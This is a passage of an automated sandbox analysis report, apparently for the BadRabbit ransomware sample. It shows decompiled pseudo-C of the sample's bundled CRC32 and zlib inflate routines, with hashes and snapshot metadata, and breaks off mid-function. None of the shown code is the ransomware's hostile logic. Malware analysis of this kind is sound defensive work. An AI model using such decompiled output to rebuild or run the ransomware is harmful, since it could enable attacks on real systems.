                                                                                                                                                                                        						_t161 =  *(0x1324f18 + (_t164 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t164 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t164 >> 0x18) * 4) ^  *(0x1325718 + (_t164 & 0x000000ff) * 4);
                                                                                                                                                                                        						_t224 = _t224 - 1;
                                                                                                                                                                                        					} while (_t224 != 0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t248 != 0) {
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t161 = _t161 >> 0x00000008 ^  *(0x1324b18 + (( *_t249 & 0x000000ff ^ _t161) & 0x000000ff) * 4);
                                                                                                                                                                                        						_t249 =  &(_t249[1]);
                                                                                                                                                                                        						_t248 = _t248 - 1;
                                                                                                                                                                                        					} while (_t248 != 0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return  !_t161;
                                                                                                                                                                                        			}













                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 8 Oet
                                                                                                                                                                                        • API String ID: 0-3278195550
                                                                                                                                                                                        • Opcode ID: f6cdbe7c7c58d5c9836790e024915df736017f01d04678ed5a58fbf993f1e40d
                                                                                                                                                                                        • Instruction ID: b2d3567a003a99f851212e3a7ca8cd9c51bbdf67b8f2698f7c64c1c912b3741f
                                                                                                                                                                                        • Opcode Fuzzy Hash: f6cdbe7c7c58d5c9836790e024915df736017f01d04678ed5a58fbf993f1e40d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7271B3317205519BD734EE1EECD0A657366F78D710F4A853CDA4683389C639E626CBD0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                        			E01321F3B(signed int* __ebx, unsigned int __edx, signed int __edi, void* __esi) {
                                                                                                                                                                                        				signed int _t753;
                                                                                                                                                                                        				int _t763;
                                                                                                                                                                                        				int _t765;
                                                                                                                                                                                        				int _t770;
                                                                                                                                                                                        				int _t771;
                                                                                                                                                                                        				signed int _t774;
                                                                                                                                                                                        				int _t775;
                                                                                                                                                                                        				void* _t796;
                                                                                                                                                                                        				int _t797;
                                                                                                                                                                                        				int _t799;
                                                                                                                                                                                        				signed int* _t800;
                                                                                                                                                                                        				signed char _t803;
                                                                                                                                                                                        				signed int _t805;
                                                                                                                                                                                        				int _t806;
                                                                                                                                                                                        				void* _t811;
                                                                                                                                                                                        				signed int _t822;
                                                                                                                                                                                        				int _t824;
                                                                                                                                                                                        				signed int _t833;
                                                                                                                                                                                        				intOrPtr _t834;
                                                                                                                                                                                        				int _t835;
                                                                                                                                                                                        				void* _t837;
                                                                                                                                                                                        				intOrPtr* _t838;
                                                                                                                                                                                        				void* _t841;
                                                                                                                                                                                        				void* _t843;
                                                                                                                                                                                        
                                                                                                                                                                                        				L0:
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					L0:
                                                                                                                                                                                        					_t837 = __esi;
                                                                                                                                                                                        					_t800 = __ebx;
                                                                                                                                                                                        					_t803 = __edi & 0x00000007;
                                                                                                                                                                                        					_t833 = __edi - _t803;
                                                                                                                                                                                        					_t822 = __edx >> _t803;
                                                                                                                                                                                        					 *(_t841 - 0xc) = _t822;
                                                                                                                                                                                        					 *(_t841 - 0x10) = _t833;
                                                                                                                                                                                        					if(_t833 >= 0x20) {
                                                                                                                                                                                        						goto L168;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L165:
                                                                                                                                                                                        					__eax =  *(__ebp - 8);
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						L166:
                                                                                                                                                                                        						__ecx =  *(__ebp - 4);
                                                                                                                                                                                        						if(__ecx == 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L167:
                                                                                                                                                                                        						__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        						 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        						__ecx = __edi;
                                                                                                                                                                                        						__eax = __eax << __cl;
                                                                                                                                                                                        						__edi = __edi + 8;
                                                                                                                                                                                        						__edx = __eax + __edx;
                                                                                                                                                                                        						 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        						__eax =  *(__ebp - 8);
                                                                                                                                                                                        						__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        						 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        						 *(__ebp - 8) = __eax;
                                                                                                                                                                                        						if(__edi < 0x20) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L168;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L323:
                                                                                                                                                                                        					_t712 = _t841 + 8; // 0x38
                                                                                                                                                                                        					_t838 =  *_t712;
                                                                                                                                                                                        					 *(_t838 + 0xc) =  *(_t841 - 0x1c);
                                                                                                                                                                                        					_t716 = _t841 - 8; // 0x38
                                                                                                                                                                                        					 *((intOrPtr*)(_t838 + 0x10)) =  *((intOrPtr*)(_t841 - 0x18));
                                                                                                                                                                                        					_t824 = 0;
                                                                                                                                                                                        					 *_t838 =  *_t716;
                                                                                                                                                                                        					 *(_t838 + 4) = _t806;
                                                                                                                                                                                        					_t800[0xf] = _t833;
                                                                                                                                                                                        					_t834 =  *((intOrPtr*)(_t841 - 0x28));
                                                                                                                                                                                        					_t800[0xe] =  *(_t841 - 0xc);
                                                                                                                                                                                        					if(_t800[0xa] != 0) {
                                                                                                                                                                                        						L328:
                                                                                                                                                                                        						_t763 = E01322DCB(_t838,  *(_t838 + 0xc), _t834 -  *((intOrPtr*)(_t838 + 0x10)));
                                                                                                                                                                                        						if(_t763 == 0) {
                                                                                                                                                                                        							L331:
                                                                                                                                                                                        							_t824 = 0;
                                                                                                                                                                                        							L332:
                                                                                                                                                                                        							_t765 =  *(_t841 - 0x38) -  *(_t838 + 4);
                                                                                                                                                                                        							_t835 = _t834 -  *((intOrPtr*)(_t838 + 0x10));
                                                                                                                                                                                        							 *((intOrPtr*)(_t838 + 8)) =  *((intOrPtr*)(_t838 + 8)) + _t765;
                                                                                                                                                                                        							 *((intOrPtr*)(_t838 + 0x14)) =  *((intOrPtr*)(_t838 + 0x14)) + _t835;
                                                                                                                                                                                        							_t800[7] = _t800[7] + _t835;
                                                                                                                                                                                        							 *(_t841 - 0x38) = _t765;
                                                                                                                                                                                        							if(_t800[2] != _t824) {
                                                                                                                                                                                        								if(_t835 != 0) {
                                                                                                                                                                                        									_push(_t835);
                                                                                                                                                                                        									_push( *(_t838 + 0xc) - _t835);
                                                                                                                                                                                        									_push(_t800[6]);
                                                                                                                                                                                        									if(_t800[4] == _t824) {
                                                                                                                                                                                        										_t774 = E01322E91();
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_t774 = E013230C1();
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t800[6] = _t774;
                                                                                                                                                                                        									_t824 = 0;
                                                                                                                                                                                        									 *(_t838 + 0x30) = _t774;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if( *_t800 == 0x13) {
                                                                                                                                                                                        								L340:
                                                                                                                                                                                        								_t824 = 0x100;
                                                                                                                                                                                        								goto L341;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								L339:
                                                                                                                                                                                        								if( *_t800 != 0xe) {
                                                                                                                                                                                        									L341:
                                                                                                                                                                                        									 *((intOrPtr*)(_t841 + 8)) = 0x80;
                                                                                                                                                                                        									asm("sbb ecx, ecx");
                                                                                                                                                                                        									_t767 =  ==  ?  *((void*)(_t841 + 8)) : 0;
                                                                                                                                                                                        									_t768 = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824;
                                                                                                                                                                                        									_t769 = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824 + _t800[0xf];
                                                                                                                                                                                        									 *((intOrPtr*)(_t838 + 0x2c)) = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824 + _t800[0xf];
                                                                                                                                                                                        									if( *(_t841 - 0x38) != 0) {
                                                                                                                                                                                        										L343:
                                                                                                                                                                                        										if( *((intOrPtr*)(_t841 + 0xc)) != 4) {
                                                                                                                                                                                        											L345:
                                                                                                                                                                                        											_t770 =  *(_t841 - 0x20);
                                                                                                                                                                                        											L138:
                                                                                                                                                                                        											return _t770;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L344:
                                                                                                                                                                                        										_t771 =  *(_t841 - 0x20);
                                                                                                                                                                                        										_t811 = 0xfffffffb;
                                                                                                                                                                                        										_t770 =  ==  ? _t811 : _t771;
                                                                                                                                                                                        										goto L138;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L342:
                                                                                                                                                                                        									if(_t835 == 0) {
                                                                                                                                                                                        										goto L344;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L343;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L340;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L329:
                                                                                                                                                                                        						 *_t800 = 0x1e;
                                                                                                                                                                                        						L330:
                                                                                                                                                                                        						_push(0xfffffffc);
                                                                                                                                                                                        						L137:
                                                                                                                                                                                        						_pop(_t770);
                                                                                                                                                                                        						goto L138;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L324:
                                                                                                                                                                                        					if(_t834 ==  *((intOrPtr*)(_t838 + 0x10))) {
                                                                                                                                                                                        						goto L332;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L325:
                                                                                                                                                                                        					if( *_t800 >= 0x1d) {
                                                                                                                                                                                        						goto L332;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L326:
                                                                                                                                                                                        					if( *_t800 < 0x1a) {
                                                                                                                                                                                        						goto L328;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L327:
                                                                                                                                                                                        					if( *((intOrPtr*)(_t841 + 0xc)) == 4) {
                                                                                                                                                                                        						goto L332;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L328;
                                                                                                                                                                                        					L168:
                                                                                                                                                                                        					_t805 = _t822 & 0x0000ffff;
                                                                                                                                                                                        					if(_t805 ==  !_t822 >> 0x10) {
                                                                                                                                                                                        						L170:
                                                                                                                                                                                        						_t800[0x10] = _t805;
                                                                                                                                                                                        						_t822 = 0;
                                                                                                                                                                                        						_t806 =  *(_t841 - 4);
                                                                                                                                                                                        						_t833 = 0;
                                                                                                                                                                                        						 *(_t841 - 0xc) = 0;
                                                                                                                                                                                        						 *(_t841 - 0x10) = 0;
                                                                                                                                                                                        						 *_t800 = 0xe;
                                                                                                                                                                                        						if( *((intOrPtr*)(_t841 + 0xc)) == 6) {
                                                                                                                                                                                        							goto L323;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L171:
                                                                                                                                                                                        						 *_t800 = 0xf;
                                                                                                                                                                                        						L172:
                                                                                                                                                                                        						_t775 = _t800[0x10];
                                                                                                                                                                                        						if(_t775 == 0) {
                                                                                                                                                                                        							L175:
                                                                                                                                                                                        							 *_t800 = 0xb;
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								L135:
                                                                                                                                                                                        								_t753 =  *_t800;
                                                                                                                                                                                        								if(_t753 > 0x1e) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								L1:
                                                                                                                                                                                        								switch( *((intOrPtr*)(_t753 * 4 +  &M01322B54))) {
                                                                                                                                                                                        									case 0:
                                                                                                                                                                                        										L2:
                                                                                                                                                                                        										if(_t800[2] != 0) {
                                                                                                                                                                                        											L4:
                                                                                                                                                                                        											_push(0x10);
                                                                                                                                                                                        											_pop(_t776);
                                                                                                                                                                                        											__eflags = _t833 - _t776;
                                                                                                                                                                                        											if(_t833 >= _t776) {
                                                                                                                                                                                        												L8:
                                                                                                                                                                                        												__eflags = _t800[2] & 0x00000002;
                                                                                                                                                                                        												if((_t800[2] & 0x00000002) == 0) {
                                                                                                                                                                                        													L11:
                                                                                                                                                                                        													_t800[4] = _t800[4] & 0x00000000;
                                                                                                                                                                                        													_t777 = _t800[8];
                                                                                                                                                                                        													__eflags = _t777;
                                                                                                                                                                                        													if(_t777 != 0) {
                                                                                                                                                                                        														_t27 = _t777 + 0x30;
                                                                                                                                                                                        														 *_t27 =  *(_t777 + 0x30) | 0xffffffff;
                                                                                                                                                                                        														__eflags =  *_t27;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L13:
                                                                                                                                                                                        													__eflags = _t800[2] & 0x00000001;
                                                                                                                                                                                        													if((_t800[2] & 0x00000001) == 0) {
                                                                                                                                                                                        														L24:
                                                                                                                                                                                        														 *(_t837 + 0x18) = "incorrect header check";
                                                                                                                                                                                        														goto L17;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L14:
                                                                                                                                                                                        													_t780 = (_t822 >> 8) + ((_t822 & 0x000000ff) << 8);
                                                                                                                                                                                        													_push(0x1f);
                                                                                                                                                                                        													_pop(_t814);
                                                                                                                                                                                        													__eflags = _t780 % _t814;
                                                                                                                                                                                        													_t822 =  *(_t841 - 0xc);
                                                                                                                                                                                        													if(_t780 % _t814 != 0) {
                                                                                                                                                                                        														goto L24;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L15:
                                                                                                                                                                                        													__eflags = (_t822 & 0x0000000f) - 8;
                                                                                                                                                                                        													if((_t822 & 0x0000000f) == 8) {
                                                                                                                                                                                        														L18:
                                                                                                                                                                                        														_t822 = _t822 >> 4;
                                                                                                                                                                                        														_t833 = _t833 - 4;
                                                                                                                                                                                        														 *(_t841 - 0xc) = _t822;
                                                                                                                                                                                        														 *(_t841 - 0x10) = _t833;
                                                                                                                                                                                        														_t817 = (_t822 & 0x0000000f) + 8;
                                                                                                                                                                                        														__eflags = _t800[9];
                                                                                                                                                                                        														if(_t800[9] != 0) {
                                                                                                                                                                                        															L22:
                                                                                                                                                                                        															__eflags = _t817 - _t800[9];
                                                                                                                                                                                        															if(_t817 <= _t800[9]) {
                                                                                                                                                                                        																goto L20;
                                                                                                                                                                                        															} else {
                                                                                                                                                                                        																 *(_t837 + 0x18) = "invalid window size";
                                                                                                                                                                                        																goto L17;
                                                                                                                                                                                        															}
                                                                                                                                                                                        														} else {
                                                                                                                                                                                        															_t800[9] = _t817;
                                                                                                                                                                                        															L20:
                                                                                                                                                                                        															_t833 = 0;
                                                                                                                                                                                        															_t800[5] = 1 << _t817;
                                                                                                                                                                                        															_t787 = E01322E91(0, 0, 0);
                                                                                                                                                                                        															_t800[6] = _t787;
                                                                                                                                                                                        															 *(_t837 + 0x30) = _t787;
                                                                                                                                                                                        															_t831 =  !( *(_t841 - 0xc) >> 8) & 0x00000002 | 0x00000009;
                                                                                                                                                                                        															__eflags = _t831;
                                                                                                                                                                                        															 *_t800 = _t831;
                                                                                                                                                                                        															_t822 = 0;
                                                                                                                                                                                        															goto L21;
                                                                                                                                                                                        														}
                                                                                                                                                                                        													} else {
                                                                                                                                                                                        														 *(_t837 + 0x18) = "unknown compression method";
                                                                                                                                                                                        														goto L17;
                                                                                                                                                                                        													}
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L9:
                                                                                                                                                                                        												__eflags = _t822 - 0x8b1f;
                                                                                                                                                                                        												if(_t822 != 0x8b1f) {
                                                                                                                                                                                        													goto L11;
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													_t833 = 0;
                                                                                                                                                                                        													_t800[6] = E013230C1(0, 0, 0);
                                                                                                                                                                                        													_push(0x1f);
                                                                                                                                                                                        													_pop(_t789);
                                                                                                                                                                                        													 *((char*)(_t841 - 0x14)) = _t789;
                                                                                                                                                                                        													 *((char*)(_t841 - 0x13)) = 0x8b;
                                                                                                                                                                                        													_t791 = E013230C1(_t800[6], _t841 - 0x14, 2);
                                                                                                                                                                                        													_t822 = 0;
                                                                                                                                                                                        													_t800[6] = _t791;
                                                                                                                                                                                        													 *(_t841 - 0xc) = 0;
                                                                                                                                                                                        													 *(_t841 - 0x10) = 0;
                                                                                                                                                                                        													 *_t800 = 1;
                                                                                                                                                                                        													goto L134;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_t6 = _t841 - 8; // 0x38
                                                                                                                                                                                        												_t792 =  *_t6;
                                                                                                                                                                                        												while(1) {
                                                                                                                                                                                        													L6:
                                                                                                                                                                                        													__eflags = _t806;
                                                                                                                                                                                        													if(_t806 == 0) {
                                                                                                                                                                                        														goto L322;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L7:
                                                                                                                                                                                        													 *(_t841 - 4) = _t806 - 1;
                                                                                                                                                                                        													_t794 = ( *_t792 & 0x000000ff) << _t833;
                                                                                                                                                                                        													_t833 = _t833 + 8;
                                                                                                                                                                                        													_t806 =  *(_t841 - 4);
                                                                                                                                                                                        													_t822 = _t822 + _t794;
                                                                                                                                                                                        													_t9 = _t841 - 8; // 0x38
                                                                                                                                                                                        													_t792 =  *_t9 + 1;
                                                                                                                                                                                        													 *(_t841 - 0xc) = _t822;
                                                                                                                                                                                        													 *(_t841 - 8) = _t792;
                                                                                                                                                                                        													 *(_t841 - 0x10) = _t833;
                                                                                                                                                                                        													__eflags = _t833 - 0x10;
                                                                                                                                                                                        													if(_t833 < 0x10) {
                                                                                                                                                                                        														continue;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													goto L8;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											 *_t800 = 0xc;
                                                                                                                                                                                        											goto L135;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									case 1:
                                                                                                                                                                                        										L25:
                                                                                                                                                                                        										_push(0x10);
                                                                                                                                                                                        										_pop(__eax);
                                                                                                                                                                                        										__eflags = __edi - __eax;
                                                                                                                                                                                        										if(__edi >= __eax) {
                                                                                                                                                                                        											L29:
                                                                                                                                                                                        											 *(__ebx + 0x10) = __edx;
                                                                                                                                                                                        											__eflags = __dl - 8;
                                                                                                                                                                                        											if(__dl == 8) {
                                                                                                                                                                                        												L32:
                                                                                                                                                                                        												__eflags = __edx & 0x0000e000;
                                                                                                                                                                                        												if((__edx & 0x0000e000) == 0) {
                                                                                                                                                                                        													L34:
                                                                                                                                                                                        													__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        													__eflags = __ecx;
                                                                                                                                                                                        													if(__ecx != 0) {
                                                                                                                                                                                        														__edx = __edx >> 8;
                                                                                                                                                                                        														__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                                                                                                        														__eflags = __eax;
                                                                                                                                                                                        														 *__ecx = __eax;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        													if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        														 *(__ebp - 0x14) = __dl;
                                                                                                                                                                                        														__eax = __ebp - 0x14;
                                                                                                                                                                                        														__eflags = __edx;
                                                                                                                                                                                        														 *(__ebp - 0x13) = __dl;
                                                                                                                                                                                        														 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__ecx =  *(__ebp - 4);
                                                                                                                                                                                        													__eax = 0;
                                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                                        													__edx = 0;
                                                                                                                                                                                        													 *__ebx = 2;
                                                                                                                                                                                        													 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        													__edi = 0;
                                                                                                                                                                                        													goto L39;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L33:
                                                                                                                                                                                        												 *(__esi + 0x18) = "unknown header flags set";
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												 *(__esi + 0x18) = "unknown compression method";
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L31;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t51 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__eax =  *_t51;
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L27:
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												if(__ecx == 0) {
                                                                                                                                                                                        													goto L322;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L28:
                                                                                                                                                                                        												__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        												 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        												__ecx = __edi;
                                                                                                                                                                                        												__eax = __eax << __cl;
                                                                                                                                                                                        												__edi = __edi + 8;
                                                                                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                                                                                        												__edx = __eax + __edx;
                                                                                                                                                                                        												_t54 = __ebp - 8; // 0x38
                                                                                                                                                                                        												__eax =  *_t54;
                                                                                                                                                                                        												__eax =  *_t54 + 1;
                                                                                                                                                                                        												 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        												 *(__ebp - 8) = __eax;
                                                                                                                                                                                        												 *(__ebp - 0x10) = __edi;
                                                                                                                                                                                        												__eflags = __edi - 0x10;
                                                                                                                                                                                        												if(__edi < 0x10) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L29;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									case 2:
                                                                                                                                                                                        										L39:
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi >= 0x20) {
                                                                                                                                                                                        											L43:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax != 0) {
                                                                                                                                                                                        												 *(__eax + 4) = __edx;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        												__eax = __edx;
                                                                                                                                                                                        												 *(__ebp - 0x14) = __dl;
                                                                                                                                                                                        												__eax = __edx >> 8;
                                                                                                                                                                                        												 *(__ebp - 0x13) = __al;
                                                                                                                                                                                        												__edx = __edx >> 0x10;
                                                                                                                                                                                        												 *(__ebp - 0x12) = __al;
                                                                                                                                                                                        												__eax = __ebp - 0x14;
                                                                                                                                                                                        												__eflags = __edx;
                                                                                                                                                                                        												 *(__ebp - 0x11) = __dl;
                                                                                                                                                                                        												 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18), __ebp - 0x14, 4);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											 *__ebx = 3;
                                                                                                                                                                                        											 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											goto L48;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L40:
                                                                                                                                                                                        										_t74 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t74;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L41:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L42:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											_t77 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__eax =  *_t77;
                                                                                                                                                                                        											__eax =  *_t77 + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											__eflags = __edi - 0x20;
                                                                                                                                                                                        											if(__edi < 0x20) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L43;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 3:
                                                                                                                                                                                        										L48:
                                                                                                                                                                                        										_push(0x10);
                                                                                                                                                                                        										_pop(__eax);
                                                                                                                                                                                        										__eflags = __edi - __eax;
                                                                                                                                                                                        										if(__edi >= __eax) {
                                                                                                                                                                                        											L52:
                                                                                                                                                                                        											__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx != 0) {
                                                                                                                                                                                        												__eax = __dl & 0x000000ff;
                                                                                                                                                                                        												 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                                                                                                        												__ecx = __edx;
                                                                                                                                                                                        												__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        												__ecx = __edx >> 8;
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												 *( *(__ebx + 0x20) + 0xc) = __ecx;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        											if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        												 *(__ebp - 0x14) = __dl;
                                                                                                                                                                                        												__eax = __ebp - 0x14;
                                                                                                                                                                                        												__eflags = __edx;
                                                                                                                                                                                        												 *(__ebp - 0x13) = __dl;
                                                                                                                                                                                        												 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18), __ebp - 0x14, 2);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											 *__ebx = 4;
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											 *(__ebp - 0xc) = 0;
                                                                                                                                                                                        											 *(__ebp - 0x10) = 0;
                                                                                                                                                                                        											goto L57;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L49:
                                                                                                                                                                                        										_t94 = __ebp - 8; // 0x38
                                                                                                                                                                                        										__eax =  *_t94;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											L50:
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L322;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L51:
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                                                                                        											__edx = __eax + __edx;
                                                                                                                                                                                        											_t97 = __ebp - 8; // 0x38
                                                                                                                                                                                        											__eax =  *_t97;
                                                                                                                                                                                        											__eax =  *_t97 + 1;
                                                                                                                                                                                        											 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        											 *(__ebp - 8) = __eax;
                                                                                                                                                                                        											__eflags = __edi - 0x10;
                                                                                                                                                                                        											if(__edi < 0x10) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L52;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L322;
                                                                                                                                                                                        									case 4:
                                                                                                                                                                                        										L57:
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                                                                                                        										if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                                                                                                        											L67:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax != 0) {
                                                                                                                                                                                        												_t138 = __eax + 0x10;
                                                                                                                                                                                        												 *_t138 =  *(__eax + 0x10) & 0x00000000;
                                                                                                                                                                                        												__eflags =  *_t138;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L69:
                                                                                                                                                                                        											 *__ebx = 5;
                                                                                                                                                                                        											goto L70;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L58:
                                                                                                                                                                                        										_push(0x10);
                                                                                                                                                                                        										_pop(__eax);
                                                                                                                                                                                        										__eflags = __edi - __eax;
                                                                                                                                                                                        										if(__edi >= __eax) {
                                                                                                                                                                                        											L62:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        											 *(__ebx + 0x40) = __edx;
